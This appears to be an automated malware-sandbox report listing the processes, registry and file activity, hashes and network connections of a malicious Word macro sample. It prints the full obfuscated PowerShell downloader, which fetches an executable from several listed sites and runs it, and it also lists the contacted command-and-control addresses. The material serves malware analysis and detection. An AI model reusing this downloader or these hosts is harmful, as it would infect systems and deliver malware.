VMRay Analyzer Report for Sample #20386 VMRay Analyzer 2.2.0 URI www.indpts.com Resolved_To Address 108.163.227.35 Process 1 2516 winword.exe 1412 winword.exe "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" C:\Users\aETAdzjz\Desktop\ c:\program files\microsoft office\root\office16\winword.exe Child_Of Created Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Process 2 2768 cmd.exe 2516 cmd.exe CmD wMic wMic wMic wMic & %Co^m^S^p^Ec^% /V /c set %binkOHOTJcSMBkQ%=EINhmPkdO&&set %kiqjRiiiH%=owe^r^s&&set %zzwpVwCTCRDvTBu%=pOwoJiQoW&&set %CdjPuLtXi%=p&&set %GKZajcAqFZkRLZw%=NazJjhVlGSrXQvT&&set %QiiPPcnDM%=^he^l^l&&set %jiIZiKXbkZQMpuQ%=dipAbiiHEplZSHr&&!%CdjPuLtXi%!!%kiqjRiiiH%!!%QiiPPcnDM%! ".( $VeRbOsePReFEREncE.tOstRinG()[1,3]+'x'-jOin'') ( ('. ( ctVpshoME[4]+ctVPsHomE[34]+VnLXVnL) ( ((VnL((uxpeAbfruxp+uxpanuxp+uxpc =uxp+uxp '+'uxp+uxpnew-obVnL+VnL'+'uxp+uxp'+'jectu'+'xp+uxp Suxp+uxpysuxp+VnL+Vn'+'L'+'uxptem'+'.Netu'+'xp+uxp.Webuxp+uxpCuxp+uxplienuxp+uxpt;VnL+VnLeAbnuxp+u'+'xpsuxp'+'+uxpVnL+VnLadauxVnL+VnLp+uVnL+VnLxps'+'d =uxp+uxpVnL+VnL nuxp+'+'uxpeuxp+uxpw-objec'+'t VnL+VnLrandom;eAbbcd ='+' YMjuxpVnL+VnL+uxphttp://www.indpts.com/UVnL+VnLH'+'SD/,httpuxp+uxp://uxp+uxpwwwuxp+uxp.fingerfuxp+uxVnL+Vn'+'Lpun.co.uxp+uxpuk/npZVn'+'L+Vn'+'LdQQy/uxp+uxp,uxpVnL+VnL+uxphttp://www.r'+'uxp+uxpelicstone.uxp+uxpcouxp+uxpm/wuxpVnL+VnL+uxp'+'p-content/themes-suVnL+VnLspeVnL+V'+'nLcted/umuxp+uxpo'+'juxp+uxpp43uxp+uxp/uNssVnL+Vn'+'Luxp+uxpuwuxp+uxpHS/,http://www.wang'+'lb.topux'+'p+uxp/wp-conteuxp+'+'uxpnt/Td/,h'+'ttuxp+uxppuxp+uxp:uxp'+'+uxp//uxp+uxpwux'+'p+uxpww.uxp+uxpfr'+'iuxp+uxVnL+Vn'+'Lpgolitfabrikuxp+uxpen.VnL+VnLse/uxp+uxpzVnL+VnLpuxp+uxpy/YMj.Spuxp+uxplituxp+uxp(YMjVnL+VnL,Yuxp+uxpMj)uxp+VnL+VnLuxp;eAbk'+'VnL+VnLauxp+uxprapas =uxp+uxp u'+'xp+uxpeAVnL+VnLbuxp+uxpnsauxp+uxpdasd.nextuxp+uxp(1, 
343245);eAuxp+uxpbhuxp+uxpua'+'s = uxp+uxpeAuxp'+'+uxpbVnL+VnLuxp+uxpenv:public + YMjuxp+uxpGW9YMu'+'xp+'+'uxpj +uVn'+'L+VnLxp+uxp eAbkarapuxp+uxpas + YMj.euxp+uxpxeYMj;uxp+uxpforeach(eAbabc in eAbbcuxVnL+VnLp+uxpd){tuxp+uxpr'+'yuxp+uxp{eAuxp+uxpbfruxp+uxpaVnL+'+'VnLnc.Downlo'+'adFile(e'+'uxp+uxpAbVnL+VnLabc.Tuxp+uxpoVnL+VnLuxp+uxpSuxp+uxptuxp+uxpring(uxp+VnL+VnLuxp),uxp+uxp euxpV'+'nL+VnL+uxpAbhuas);uxp+uxpInuxp+uxpvoke-ItemuxVnL+VnLp+uxp(eAbhVnL+VnLuas)uxp+uxp'+';break'+'VnL+VnL;}catch{write-host uxp+uxpeuxp+uxpAb_.Euxp+uxpxceptionuxVnL+V'+'nLp+uxpVnL+VnL.Messuxp+uxpag'+'e;}}VnL+VnLuxp)-REplaCE uxpGW9'+'uxp,[cHa'+'r]92-CREpLaCE ([c'+'Har]8'+'9+[cHar]77+[cHar]106),[cHar]39-CREpLaCE([cHVnL+VnLar]101+[cHar]6'+'5+[cHar]VnL+Vn'+'L98),[cHar]36) z3L .( 79JEnv:PubLic[13]+VnL+VnL79Jenv:PubLIC[5]+uxpXuxp)VnL) -rePlAce'+' VnLz3LVnL,[cHAR]124-rePlAce VnLuxpVnL,[cHAR]39 -cREpLaCe([c'+'HAR]55+[cHAR]57+[cHAR]74),[cHAR]36) ) ').repLacE('ctV','$').repLacE('VnL',[String][char]39) ) C:\Users\aETAdzjz\Desktop\ c:\windows\system32\cmd.exe Child_Of Created Opened Opened Opened Opened Opened Process 3 2796 powershell.exe 2768 powershell.exe powershell ".( $VeRbOsePReFEREncE.tOstRinG()[1,3]+'x'-jOin'') ( ('. 
( ctVpshoME[4]+ctVPsHomE[34]+VnLXVnL) ( ((VnL((uxpeAbfruxp+uxpanuxp+uxpc =uxp+uxp '+'uxp+uxpnew-obVnL+VnL'+'uxp+uxp'+'jectu'+'xp+uxp Suxp+uxpysuxp+VnL+Vn'+'L'+'uxptem'+'.Netu'+'xp+uxp.Webuxp+uxpCuxp+uxplienuxp+uxpt;VnL+VnLeAbnuxp+u'+'xpsuxp'+'+uxpVnL+VnLadauxVnL+VnLp+uVnL+VnLxps'+'d =uxp+uxpVnL+VnL nuxp+'+'uxpeuxp+uxpw-objec'+'t VnL+VnLrandom;eAbbcd ='+' YMjuxpVnL+VnL+uxphttp://www.indpts.com/UVnL+VnLH'+'SD/,httpuxp+uxp://uxp+uxpwwwuxp+uxp.fingerfuxp+uxVnL+Vn'+'Lpun.co.uxp+uxpuk/npZVn'+'L+Vn'+'LdQQy/uxp+uxp,uxpVnL+VnL+uxphttp://www.r'+'uxp+uxpelicstone.uxp+uxpcouxp+uxpm/wuxpVnL+VnL+uxp'+'p-content/themes-suVnL+VnLspeVnL+V'+'nLcted/umuxp+uxpo'+'juxp+uxpp43uxp+uxp/uNssVnL+Vn'+'Luxp+uxpuwuxp+uxpHS/,http://www.wang'+'lb.topux'+'p+uxp/wp-conteuxp+'+'uxpnt/Td/,h'+'ttuxp+uxppuxp+uxp:uxp'+'+uxp//uxp+uxpwux'+'p+uxpww.uxp+uxpfr'+'iuxp+uxVnL+Vn'+'Lpgolitfabrikuxp+uxpen.VnL+VnLse/uxp+uxpzVnL+VnLpuxp+uxpy/YMj.Spuxp+uxplituxp+uxp(YMjVnL+VnL,Yuxp+uxpMj)uxp+VnL+VnLuxp;eAbk'+'VnL+VnLauxp+uxprapas =uxp+uxp u'+'xp+uxpeAVnL+VnLbuxp+uxpnsauxp+uxpdasd.nextuxp+uxp(1, 343245);eAuxp+uxpbhuxp+uxpua'+'s = uxp+uxpeAuxp'+'+uxpbVnL+VnLuxp+uxpenv:public + YMjuxp+uxpGW9YMu'+'xp+'+'uxpj +uVn'+'L+VnLxp+uxp eAbkarapuxp+uxpas + YMj.euxp+uxpxeYMj;uxp+uxpforeach(eAbabc in eAbbcuxVnL+VnLp+uxpd){tuxp+uxpr'+'yuxp+uxp{eAuxp+uxpbfruxp+uxpaVnL+'+'VnLnc.Downlo'+'adFile(e'+'uxp+uxpAbVnL+VnLabc.Tuxp+uxpoVnL+VnLuxp+uxpSuxp+uxptuxp+uxpring(uxp+VnL+VnLuxp),uxp+uxp euxpV'+'nL+VnL+uxpAbhuas);uxp+uxpInuxp+uxpvoke-ItemuxVnL+VnLp+uxp(eAbhVnL+VnLuas)uxp+uxp'+';break'+'VnL+VnL;}catch{write-host uxp+uxpeuxp+uxpAb_.Euxp+uxpxceptionuxVnL+V'+'nLp+uxpVnL+VnL.Messuxp+uxpag'+'e;}}VnL+VnLuxp)-REplaCE uxpGW9'+'uxp,[cHa'+'r]92-CREpLaCE ([c'+'Har]8'+'9+[cHar]77+[cHar]106),[cHar]39-CREpLaCE([cHVnL+VnLar]101+[cHar]6'+'5+[cHar]VnL+Vn'+'L98),[cHar]36) z3L .( 79JEnv:PubLic[13]+VnL+VnL79Jenv:PubLIC[5]+uxpXuxp)VnL) -rePlAce'+' VnLz3LVnL,[cHAR]124-rePlAce VnLuxpVnL,[cHAR]39 -cREpLaCe([c'+'HAR]55+[cHAR]57+[cHAR]74),[cHAR]36) ) 
').repLacE('ctV','$').repLacE('VnL',[String][char]39) ) C:\Users\aETAdzjz\Desktop\ c:\windows\system32\windowspowershell\v1.0\powershell.exe Child_Of Created Created Created Created Created Created Created Created Created Created Created Created Created Created Created Opened Created Created Created Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Read_From Connected_To Connected_To Connected_To Process 4 2860 3292.exe 2796 3292.exe "C:\Users\Public\3292.exe" C:\Users\aETAdzjz\Desktop\ c:\users\public\3292.exe Child_Of Opened Process 5 2884 3292.exe 2860 3292.exe "C:\Users\Public\3292.exe" C:\Users\aETAdzjz\Desktop\ c:\users\public\3292.exe Child_Of Created Moved Deleted Opened Process 6 3068 systeminfo.exe 2884 systeminfo.exe "C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\systeminfo.exe" C:\Users\aETAdzjz\Desktop\ c:\users\aetadzjz\appdata\local\microsoft\windows\systeminfo.exe Child_Of Opened Process 7 2076 systeminfo.exe 3068 systeminfo.exe "C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\systeminfo.exe" C:\Users\aETAdzjz\Desktop\ c:\users\aetadzjz\appdata\local\microsoft\windows\systeminfo.exe Child_Of Child_Of Child_Of Child_Of Created Deleted Deleted Deleted Opened Connected_To Connected_To Connected_To Connected_To Process 8 1016 svchost.exe 476 svchost.exe C:\Windows\system32\svchost.exe -k LocalService C:\Windows\system32\ c:\windows\system32\svchost.exe Child_Of Process 9 1652 systeminfo.exe 2076 systeminfo.exe "C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\systeminfo.exe" "C:\ProgramData\FB6F.tmp" 
C:\Users\aETAdzjz\Desktop\ c:\users\aetadzjz\appdata\local\microsoft\windows\systeminfo.exe Opened Opened Opened Opened Process 10 2712 systeminfo.exe 2076 systeminfo.exe "C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\systeminfo.exe" /scomma "C:\ProgramData\FB70.tmp" C:\Users\aETAdzjz\Desktop\ c:\users\aetadzjz\appdata\local\microsoft\windows\systeminfo.exe Created Created Created Created Created Created Created Opened Opened Opened Opened Process 11 1644 systeminfo.exe 2076 systeminfo.exe "C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\systeminfo.exe" /scomma "C:\ProgramData\FB2F.tmp" C:\Users\aETAdzjz\Desktop\ c:\users\aetadzjz\appdata\local\microsoft\windows\systeminfo.exe Created Created Created Created Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Process 12 376 svchost.exe 476 svchost.exe C:\Windows\system32\svchost.exe -k NetworkService C:\Windows\system32\ c:\windows\system32\svchost.exe Process 13 1496 systeminfo.exe 1260 systeminfo.exe "C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\systeminfo.exe" C:\Windows\system32\ c:\users\aetadzjz\appdata\local\microsoft\windows\systeminfo.exe Child_Of Opened Process 14 1948 systeminfo.exe 1496 systeminfo.exe "C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\systeminfo.exe" C:\Windows\system32\ c:\users\aetadzjz\appdata\local\microsoft\windows\systeminfo.exe Child_Of Created Opened Created Created Connected_To Connected_To Process 15 984 svchost.exe 476 svchost.exe C:\Windows\system32\svchost.exe -k LocalService C:\Windows\system32\ c:\windows\system32\svchost.exe WinRegistryKey Licenses HKEY_CLASSES_ROOT WinRegistryKey TypeLib HKEY_CLASSES_ROOT WinRegistryKey TypeLib\{00020905-0000-0000-C000-000000000046} HKEY_CLASSES_ROOT WinRegistryKey 
TypeLib\{00020905-0000-0000-C000-000000000046}\8.7 HKEY_CLASSES_ROOT WinRegistryKey TypeLib\{00020905-0000-0000-C000-000000000046}\8.7\409 HKEY_CLASSES_ROOT WinRegistryKey win64 INVALID WinRegistryKey TypeLib\{00020905-0000-0000-C000-000000000046}\8.7\0 HKEY_CLASSES_ROOT WinRegistryKey TypeLib HKEY_CLASSES_ROOT WinRegistryKey TypeLib\{00020430-0000-0000-C000-000000000046} HKEY_CLASSES_ROOT WinRegistryKey TypeLib\{00020430-0000-0000-C000-000000000046}\2.0 HKEY_CLASSES_ROOT WinRegistryKey TypeLib\{00020430-0000-0000-C000-000000000046}\2.0\0 HKEY_CLASSES_ROOT WinRegistryKey TypeLib\{00020430-0000-0000-C000-000000000046}\2.0\0\win64 HKEY_CLASSES_ROOT WinRegistryKey TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52} HKEY_CLASSES_ROOT WinRegistryKey TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}\2.8 HKEY_CLASSES_ROOT WinRegistryKey TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}\2.8\0 HKEY_CLASSES_ROOT WinRegistryKey TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}\2.8\0\win64 HKEY_CLASSES_ROOT WinRegistryKey TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}\2.8\0 HKEY_CLASSES_ROOT WinRegistryKey TypeLib HKEY_CLASSES_ROOT WinRegistryKey TypeLib\{00020905-0000-0000-C000-000000000046} HKEY_CLASSES_ROOT WinRegistryKey TypeLib\{00020905-0000-0000-C000-000000000046}\8.7 HKEY_CLASSES_ROOT WinRegistryKey TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}\2.8\0\win64\win64 HKEY_CLASSES_ROOT WinRegistryKey TypeLib\{00020905-0000-0000-C000-000000000046}\8.7\0 HKEY_CLASSES_ROOT WinRegistryKey Licenses\8804558B-B773-11d1-BC3E-0000F87552E7 HKEY_CLASSES_ROOT WinRegistryKey Software\Microsoft\VBA\7.1\Common HKEY_CURRENT_USER RequireDeclaration CompileOnDemand NotifyUserBeforeStateLoss BackGroundCompile BreakOnAllErrors BreakOnServerErrors WinRegistryKey TypeLib\{00020905-0000-0000-C000-000000000046}\8.7\0\win64 HKEY_CLASSES_ROOT WinRegistryKey TypeLib\{00020430-0000-0000-C000-000000000046}\2.0\0\win64 HKEY_CLASSES_ROOT WinRegistryKey TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}\2.8\0\win64 
HKEY_CLASSES_ROOT File STD_OUTPUT_HANDLE File STD_INPUT_HANDLE WinRegistryKey Software\Policies\Microsoft\Windows\System HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Command Processor HKEY_LOCAL_MACHINE DisableUNCCheck EnableExtensions DelayedExpansion DefaultColor CompletionChar PathCompletionChar AutoRun WinRegistryKey Software\Microsoft\Command Processor HKEY_CURRENT_USER DisableUNCCheck EnableExtensions DelayedExpansion DefaultColor CompletionChar PathCompletionChar AutoRun File conout$ File windows\system32\windowspowershell\v1.0\getevent.types.ps1xml windows\system32\windowspowershell\v1.0\getevent.types.ps1xml c:\ c:\windows\system32\windowspowershell\v1.0\getevent.types.ps1xml ps1xml File windows\system32\windowspowershell\v1.0\types.ps1xml windows\system32\windowspowershell\v1.0\types.ps1xml c:\ c:\windows\system32\windowspowershell\v1.0\types.ps1xml ps1xml File windows\system32\windowspowershell\v1.0\diagnostics.format.ps1xml windows\system32\windowspowershell\v1.0\diagnostics.format.ps1xml c:\ c:\windows\system32\windowspowershell\v1.0\diagnostics.format.ps1xml ps1xml File windows\system32\windowspowershell\v1.0\wsman.format.ps1xml windows\system32\windowspowershell\v1.0\wsman.format.ps1xml c:\ c:\windows\system32\windowspowershell\v1.0\wsman.format.ps1xml ps1xml File windows\system32\windowspowershell\v1.0\certificate.format.ps1xml windows\system32\windowspowershell\v1.0\certificate.format.ps1xml c:\ c:\windows\system32\windowspowershell\v1.0\certificate.format.ps1xml ps1xml File windows\system32\windowspowershell\v1.0\dotnettypes.format.ps1xml windows\system32\windowspowershell\v1.0\dotnettypes.format.ps1xml c:\ c:\windows\system32\windowspowershell\v1.0\dotnettypes.format.ps1xml ps1xml File windows\system32\windowspowershell\v1.0\filesystem.format.ps1xml windows\system32\windowspowershell\v1.0\filesystem.format.ps1xml c:\ c:\windows\system32\windowspowershell\v1.0\filesystem.format.ps1xml ps1xml File 
windows\system32\windowspowershell\v1.0\help.format.ps1xml windows\system32\windowspowershell\v1.0\help.format.ps1xml c:\ c:\windows\system32\windowspowershell\v1.0\help.format.ps1xml ps1xml File windows\system32\windowspowershell\v1.0\powershellcore.format.ps1xml windows\system32\windowspowershell\v1.0\powershellcore.format.ps1xml c:\ c:\windows\system32\windowspowershell\v1.0\powershellcore.format.ps1xml ps1xml File windows\system32\windowspowershell\v1.0\powershelltrace.format.ps1xml windows\system32\windowspowershell\v1.0\powershelltrace.format.ps1xml c:\ c:\windows\system32\windowspowershell\v1.0\powershelltrace.format.ps1xml ps1xml File windows\system32\windowspowershell\v1.0\registry.format.ps1xml windows\system32\windowspowershell\v1.0\registry.format.ps1xml c:\ c:\windows\system32\windowspowershell\v1.0\registry.format.ps1xml ps1xml File windows\microsoft.net\framework64\v2.0.50727\config\machine.config windows\microsoft.net\framework64\v2.0.50727\config\machine.config c:\ c:\windows\microsoft.net\framework64\v2.0.50727\config\machine.config config File users\public\3292.exe users\public\3292.exe c:\ c:\users\public\3292.exe exe MD5 ca6f2ee0e3b7218da76d126d22f707be SHA1 a7fc89d6b45ce712c0be6600be4a8e6de9de434d SHA256 b4e2b553642c3772769b83c5be8623f22f90323e626d9c8945585368445af8a4 File STD_INPUT_HANDLE Mutex Global\.net clr networking Mutex Global\.net clr networking Mutex Global\.net clr networking WinRegistryKey Software\Microsoft\PowerShell HKEY_LOCAL_MACHINE WinRegistryKey Software\Microsoft\PowerShell\1 HKEY_LOCAL_MACHINE WinRegistryKey Software\Microsoft\PowerShell\1\PowerShellEngine HKEY_LOCAL_MACHINE ApplicationBase ApplicationBase WinRegistryKey System\CurrentControlSet\Control\Session Manager\Environment HKEY_LOCAL_MACHINE PSMODULEPATH PSMODULEPATH WinRegistryKey Environment HKEY_CURRENT_USER PSMODULEPATH WinRegistryKey SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell HKEY_LOCAL_MACHINE path path WinRegistryKey 
Software\Microsoft\PowerShell\1\PowerShellEngine HKEY_LOCAL_MACHINE ApplicationBase ApplicationBase WinRegistryKey SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell HKEY_LOCAL_MACHINE path path WinRegistryKey Software\Microsoft\PowerShell\1\PowerShellEngine HKEY_LOCAL_MACHINE ApplicationBase ApplicationBase WinRegistryKey SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN HKEY_LOCAL_MACHINE StackVersion StackVersion WinRegistryKey SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN HKEY_LOCAL_MACHINE StackVersion StackVersion WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\Application HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\Application\PowerShell HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents\PowerShell HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer\PowerShell HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service\PowerShell HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\Media Center HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\Media Center\PowerShell HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\OAlerts HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\OAlerts\PowerShell HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\Security HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\System HKEY_LOCAL_MACHINE WinRegistryKey 
SYSTEM\CurrentControlSet\Services\EventLog\System\PowerShell HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\Application HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\Media Center HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\OAlerts HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\System HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\Application HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\Media Center HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\OAlerts HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\System HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell 
HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\Application HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\Media Center HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\OAlerts HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\System HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell HKEY_LOCAL_MACHINE WinRegistryKey Software\Microsoft\PowerShell\1\PowerShellEngine HKEY_LOCAL_MACHINE ApplicationBase ApplicationBase WinRegistryKey Software\Microsoft\PowerShell\1\PowerShellEngine HKEY_LOCAL_MACHINE ApplicationBase ApplicationBase WinRegistryKey SOFTWARE\Microsoft\PowerShell\1\ShellIds HKEY_LOCAL_MACHINE PipelineMaxStackSizeMB WinRegistryKey Software\Microsoft\Windows NT\CurrentVersion HKEY_LOCAL_MACHINE InstallationType InstallationType WinRegistryKey SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance HKEY_LOCAL_MACHINE Library Library IsMultiInstance IsMultiInstance First Counter First Counter WinRegistryKey SYSTEM\CurrentControlSet\Services\.net clr networking\Performance HKEY_LOCAL_MACHINE CategoryOptions CategoryOptions FileMappingSize FileMappingSize Counter Names WinRegistryKey HKEY_CURRENT_USER WinRegistryKey SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections HKEY_CURRENT_USER WinRegistryKey 
SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections HKEY_LOCAL_MACHINE WinRegistryKey SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings HKEY_LOCAL_MACHINE WinRegistryKey SOFTWARE\Microsoft\PowerShell\1\ShellIds HKEY_LOCAL_MACHINE PipelineMaxStackSizeMB DNSRecord www.indpts.com SocketAddress 108.163.227.35 80 TCP NetworkSocket 108.163.227.35 80 TCP Contains SocketAddress www.indpts.com 80 NetworkConnection HTTP www.indpts.com 80 URI www.indpts.com/UHSD/ Contains URI None Mutex XoBZXxTVpSVrDHIx3tCj File Users\aETAdzjz\AppData\Local\Microsoft\Windows\systeminfo.exe Users\aETAdzjz\AppData\Local\Microsoft\Windows\systeminfo.exe C:\ C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\systeminfo.exe exe MD5 ca6f2ee0e3b7218da76d126d22f707be SHA1 a7fc89d6b45ce712c0be6600be4a8e6de9de434d SHA256 b4e2b553642c3772769b83c5be8623f22f90323e626d9c8945585368445af8a4 Moved_To File Users\Public\3292.exe Users\Public\3292.exe C:\ C:\Users\Public\3292.exe exe Moved_From File c:\users\aetadzjz\appdata\local\microsoft\windows\systeminfo.exe:zone.identifier File programdata\fb6f.tmp programdata\fb6f.tmp c:\ c:\programdata\fb6f.tmp tmp MD5 d41d8cd98f00b204e9800998ecf8427e SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709 SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 File programdata\fb2f.tmp programdata\fb2f.tmp c:\ c:\programdata\fb2f.tmp tmp MD5 d41d8cd98f00b204e9800998ecf8427e SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709 SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 File programdata\fb70.tmp programdata\fb70.tmp c:\ c:\programdata\fb70.tmp tmp MD5 d41d8cd98f00b204e9800998ecf8427e SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709 SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 SocketAddress 173.201.20.6 7080 NetworkConnection HTTP 173.201.20.6 7080 SocketAddress 159.203.94.198 8080 NetworkConnection HTTP 159.203.94.198 8080 URI 173.201.20.6 Contains URI 159.203.94.198 Contains File 
STD_INPUT_HANDLE File STD_OUTPUT_HANDLE File STD_ERROR_HANDLE WinRegistryKey Software\Clients\Mail\Microsoft Outlook HKEY_LOCAL_MACHINE DLLPathEx MSIApplicationLCID File users\aetadzjz\appdata\local\microsoft\windows\history\history.ie5\index.dat users\aetadzjz\appdata\local\microsoft\windows\history\history.ie5\index.dat c:\ c:\users\aetadzjz\appdata\local\microsoft\windows\history\history.ie5\index.dat dat File users\aetadzjz\appdata\local\microsoft\windows\history\history.ie5\mshist012017110620171113\index.dat users\aetadzjz\appdata\local\microsoft\windows\history\history.ie5\mshist012017110620171113\index.dat c:\ c:\users\aetadzjz\appdata\local\microsoft\windows\history\history.ie5\mshist012017110620171113\index.dat dat File users\aetadzjz\appdata\local\microsoft\windows\history\history.ie5\mshist012017112820171129\index.dat users\aetadzjz\appdata\local\microsoft\windows\history\history.ie5\mshist012017112820171129\index.dat c:\ c:\users\aetadzjz\appdata\local\microsoft\windows\history\history.ie5\mshist012017112820171129\index.dat dat File users\aetadzjz\appdata\local\microsoft\windows\history\low\history.ie5\index.dat users\aetadzjz\appdata\local\microsoft\windows\history\low\history.ie5\index.dat c:\ c:\users\aetadzjz\appdata\local\microsoft\windows\history\low\history.ie5\index.dat dat File users\aetadzjz\appdata\local\microsoft\windows\history\low\history.ie5\mshist012017070320170710\index.dat users\aetadzjz\appdata\local\microsoft\windows\history\low\history.ie5\mshist012017070320170710\index.dat c:\ c:\users\aetadzjz\appdata\local\microsoft\windows\history\low\history.ie5\mshist012017070320170710\index.dat dat File users\aetadzjz\appdata\local\microsoft\windows\history\low\history.ie5\mshist012017071220170713\index.dat 